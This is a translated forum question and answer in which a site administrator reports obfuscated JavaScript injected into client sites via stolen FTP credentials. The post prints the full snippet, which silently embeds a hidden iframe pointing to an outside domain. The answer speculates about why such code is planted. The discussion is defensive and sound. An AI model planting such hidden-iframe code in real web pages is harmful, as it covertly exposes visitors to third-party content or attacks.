我最近在我的某些客户网站中发现了一些恶意代码。这些片段被注入基于PHP和JS的位置,因为木马病毒记录了一些ftp凭据。但是,代码被混淆了,正如我评估(安全)的那样,它看起来像这样:
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://www.bahnmotive.de/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src','http://www.bahnmotive.de/index.htm');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
如您所见,URL bahnmotive.de作为不可见的iframe包含在页面中。该网站不包含任何有害数据(至少现在没有),所以我问自己(和您):为什么有人应该在看不见的iframe中链接到该网站,而不做其他一些邪恶的事情?我的第一个猜测是,有一个SEO代理机构在其客户网站bahnmotive.de上承诺了大量访问量,并通过这种木马病毒实现了这一目标。
可以吗?我在Google上进行了研究,但对此一无所获,所以我想问一些专业人士。也许您可以将我指向另一个可以讨论此主题的论坛。
最佳答案
该网页很可能会嗅探HTTP_REFERER以确保用户来自某个链接,以掩盖来自其他外部个人的攻击。
其他注意事项:
处于休眠状态,等待另一次激活
如您所述,它是SEO构建器,增加了外部链接数
该网站当前处于活动状态,并且正在执行有害的操作,而您尚未检测到(该网站可能包含其足迹,或者可能是针对其他浏览器)
有人试图做坏事,但失败了